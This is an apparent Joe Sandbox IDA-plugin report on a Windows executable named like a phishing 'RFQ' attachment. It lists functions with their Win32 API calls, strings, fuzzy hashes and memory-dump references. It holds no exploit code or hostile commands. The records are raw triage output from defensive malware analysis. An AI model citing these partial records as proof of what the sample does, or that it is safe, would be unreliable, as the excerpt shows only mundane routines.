String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 8abf7d2c726fb0a80ba3e8f54fdf7a871a2ada4f1255de1d4a63342638e48a00
Instruction ID: 743c89ec1be8f3b6cfe40c528e2526a533573b02274d3a1687b28713588ebf87
Opcode Fuzzy Hash: 8abf7d2c726fb0a80ba3e8f54fdf7a871a2ada4f1255de1d4a63342638e48a00
Instruction Fuzzy Hash: AB41D772A10205AFDB24EF35D841A7673E8EF09304F20487FE549E6393EA3D9D068B19

Function 00487152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0048716A
CreateMenu.USER32 ref: 00487185
SetMenu.USER32(?,00000000), ref: 00487194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487221
IsMenu.USER32(?), ref: 00487237
CreatePopupMenu.USER32 ref: 00487241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0048726E
DrawMenuBar.USER32 ref: 00487276

Strings

0, xrefs: 00487160
F, xrefs: 00487262

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
Instruction ID: ef621a00a8965f8f9a50d7f8a7e1c0e3a51c02c5d80a3ac9dc969039337b3b35
Opcode Fuzzy Hash: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
Instruction Fuzzy Hash: 2A419B74A01204EFDB10EF64D898E9E7BB5FF09300F240469F915A7361D735A910DF98

Function 004874BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0048755E
CreateCompatibleDC.GDI32(00000000), ref: 00487565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00487578
SelectObject.GDI32(00000000,00000000), ref: 00487580
GetPixel.GDI32(00000000,00000000,00000000), ref: 0048758B
DeleteDC.GDI32(00000000), ref: 00487594
GetWindowLongW.USER32(?,000000EC), ref: 0048759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004875B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004875BE

Strings

static, xrefs: 004874F6

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
Instruction ID: 1923f87f84a105141cc97cd4dfb73f9ea5de9f9edaf5dec82e4c1ac095da0f9d
Opcode Fuzzy Hash: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
Instruction Fuzzy Hash: FA316D72104214BBDF11AF64DC08FDF3BA9FF09364F210A29FA15A61A0D739D815DBA8

Function 00426E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00426E3E

Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28

__gmtime64_s.LIBCMT ref: 00426ED7
__gmtime64_s.LIBCMT ref: 00426F0D
__gmtime64_s.LIBCMT ref: 00426F2A
__allrem.LIBCMT ref: 00426F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426F9C
__allrem.LIBCMT ref: 00426FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426FD1
__allrem.LIBCMT ref: 00426FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00427006
__invoke_watson.LIBCMT ref: 00427077

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: cc18d51bddcb3bff235d9ba930da6ebb912618c2495e950f743dda1aeb2a8d13
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: F8710876B00726ABD714AF79EC41B5BB3A4AF04328F55412FF514D7281EB78ED048B98

Function 00462527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00462542
GetMenuItemInfoW.USER32(004C5890,000000FF,00000000,00000030), ref: 004625A3
SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 004625D9
Sleep.KERNEL32(000001F4), ref: 004625EB
GetMenuItemCount.USER32(?), ref: 0046262F
GetMenuItemID.USER32(?,00000000), ref: 0046264B
GetMenuItemID.USER32(?,-00000001), ref: 00462675
GetMenuItemID.USER32(?,?), ref: 004626BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462735

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
Instruction ID: d041e2a6511ad081bd824cff42eca7b157938f8ca15e77e0b80393dec237999e
Opcode Fuzzy Hash: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
Instruction Fuzzy Hash: 3361B470900A49BFDB11CF64CE84DBF7BB8FB01345F14046AE842A7251E7B9AD05DB2A

Function 00486F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00486FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00486FA8
GetWindowLongW.USER32(?,000000F0), ref: 00486FCC
_memset.LIBCMT ref: 00486FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00486FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00487067

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
Instruction ID: 7132dcb9391edd1f4fca7d59f8acd98ed1f58d557d43f29f177e0b8d5bde9df6
Opcode Fuzzy Hash: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
Instruction Fuzzy Hash: 17618E75900208AFDB10EFA4CC85EEE77B8EB09700F20056AFA14A73A1C775AD51DB64

Function 00456B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00456BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00456C18
VariantInit.OLEAUT32(?), ref: 00456C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00456C4A
VariantCopy.OLEAUT32(?,?), ref: 00456C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00456CB1
VariantClear.OLEAUT32(?), ref: 00456CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00456CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CDC
VariantClear.OLEAUT32(?), ref: 00456CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CF9

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
Instruction ID: 21fd5a8c16b11a42553d074c3324144f158a868588d4a73b9a3ed32873cef97c
Opcode Fuzzy Hash: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
Instruction Fuzzy Hash: F1418231A001199FCF00DFA9D8449AEBBB9EF18315F01847EE955E7362CB34A949CF94

Function 004783BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

CoInitialize.OLE32 ref: 00478403
CoUninitialize.OLE32 ref: 0047840E
CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
IIDFromString.OLE32(?,?), ref: 004784E1
VariantInit.OLEAUT32(?), ref: 0047857B
VariantClear.OLEAUT32(?), ref: 004785DC

Strings

NULL Pointer assignment, xrefs: 004784B3
Invalid parameter, xrefs: 004784FA
Failed to create object, xrefs: 00478479, 0047852F

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: e4e8ad441c739ddd80c6c517f888890eca7b77d5193a955d0624545bb73c2104
Instruction ID: cb75df2b24e16c1c2e0b5d8d850f15e0fc33cba1d2aa6ec0deb68a9cf625d14d
Opcode Fuzzy Hash: e4e8ad441c739ddd80c6c517f888890eca7b77d5193a955d0624545bb73c2104
Instruction Fuzzy Hash: AA61C170648312AFC710DF14C848B9FB7E8AF44744F00881EF9899B291DB78ED48CB9A

Function 00475732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00475793
inet_addr.WSOCK32(?,?,?), ref: 004757D8
gethostbyname.WSOCK32(?), ref: 004757E4
IcmpCreateFile.IPHLPAPI ref: 004757F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00475862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00475878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 004758ED
WSACleanup.WSOCK32 ref: 004758F3

Strings

Ping, xrefs: 00475816

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 2bd1db003c0c2ad954a2c3f483633db99534e2d49977fb36df0219afc9ff4d9c
Instruction ID: e00705f4e0379358c1930da5d1710ca1d0dba9501fb2cabd0d468b8ffa352f64
Opcode Fuzzy Hash: 2bd1db003c0c2ad954a2c3f483633db99534e2d49977fb36df0219afc9ff4d9c
Instruction Fuzzy Hash: 08519F716006009FD710AF25DC45B6A77E4EF48714F05892EF95AEB3A1DB78EC14CB4A

Function 0046B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0046B4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B546
GetLastError.KERNEL32 ref: 0046B550
SetErrorMode.KERNEL32(00000000,READY), ref: 0046B5BD

Strings

NOTREADY, xrefs: 0046B57C
READONLY, xrefs: 0046B588
READY, xrefs: 0046B596
UNKNOWN, xrefs: 0046B575
INVALID, xrefs: 0046B58F

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
Instruction ID: 3fb85926d1a8df40b98e85eadc692d0a6e2328ff5e483d9ffe01cb822ebdbf3c
Opcode Fuzzy Hash: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
Instruction Fuzzy Hash: 29318675A00205AFCB00EB68C845AEE77B4FF45318F10416BF506D7291EB799E86CB9A

Function 00458F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
GetDlgCtrlID.USER32 ref: 0045901F
GetParent.USER32 ref: 0045903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 0045903E
GetDlgCtrlID.USER32(?), ref: 00459047
GetParent.USER32(?), ref: 00459063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00459066

Strings

ComboBox, xrefs: 00458F9C
ListBox, xrefs: 00458FD1

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
Instruction ID: 6714b25adca5f569a88cfbaafbe7bd2dd1ba81f724cd7e2599907f028ed7346a
Opcode Fuzzy Hash: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
Instruction Fuzzy Hash: D021D870A00108BFDF04ABA1CC85EFEB774EF45310F10062AF911672E2DB795819DB28

Function 0045907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004590FD
GetDlgCtrlID.USER32 ref: 00459108
GetParent.USER32 ref: 00459124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00459127
GetDlgCtrlID.USER32(?), ref: 00459130
GetParent.USER32(?), ref: 0045914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 0045914F

Strings

ComboBox, xrefs: 00459087
ListBox, xrefs: 004590BC

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
Instruction ID: 4d8cd3b83cca1d69534b37f7086261ba2dc9307f4c099413b547fbd15d3c7d68
Opcode Fuzzy Hash: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
Instruction Fuzzy Hash: AA21B674A00108BFDF01ABA5CC85EFEBB74EF44301F50452BB911A72A2DB795819DB29

Function 00459163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 0045916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00459184
_wcscmp.LIBCMT ref: 00459196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00459211

Strings

details, xrefs: 004591BF
SHELLDLL_DefView, xrefs: 00459190
smallicons, xrefs: 004591D9
list, xrefs: 004591F3
largeicons, xrefs: 004591A5

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
Instruction ID: f102ea4107ca07b1db40aa5d7e68bb0b9a0f71bc8f584d68d6a8224326f4a83e
Opcode Fuzzy Hash: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
Instruction Fuzzy Hash: 3111E776248317F9FA112624EC06DAB379CAB15721F30046BFD00E40D2FEA95C56666C

Function 004611CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004611F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460268,?,00000001), ref: 00461204
GetWindowThreadProcessId.USER32(00000000), ref: 0046120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 0046121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0046122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 0046129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612BC

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
Instruction ID: 1e48a1bdefc3aaf7905b324a82868e76ea33fb60fcd143e126220ea2d996acdd
Opcode Fuzzy Hash: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
Instruction Fuzzy Hash: 2B31D275600208BFDB109F54EC98F6A37A9EF54315F1582BEFA00E62B0E7789D448B5E

Function 00479113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00479167
